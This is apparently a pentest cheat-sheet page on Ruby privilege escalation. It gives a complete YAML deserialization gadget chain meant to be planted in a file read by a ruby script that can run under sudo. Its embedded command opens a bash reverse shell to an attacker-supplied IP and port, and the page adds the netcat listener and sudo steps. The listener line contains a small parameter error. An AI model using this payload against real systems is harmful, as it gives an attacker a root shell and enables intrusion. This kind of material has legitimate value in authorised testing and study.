Ruby Privilege Escalation
Last modified: 2023-03-28
Ruby is an interpreted, high-level, general-purpose programming language.
Remote Code Execution with YAML
Check if the current user could run the ruby script as root privilege.
(root) NOPASSWD: /usr/bin/ruby sample.rb
If the sample.rb contains the “File.read(’sample.yml’)”, modify the YAML file as follow:
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: "bash -c 'bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1'"
method_id: :resolve
Then start listener in local machine.
nc -lvnp <local-ip>
Now run the sudo command.
sudo /usr/bin/ruby sample.rb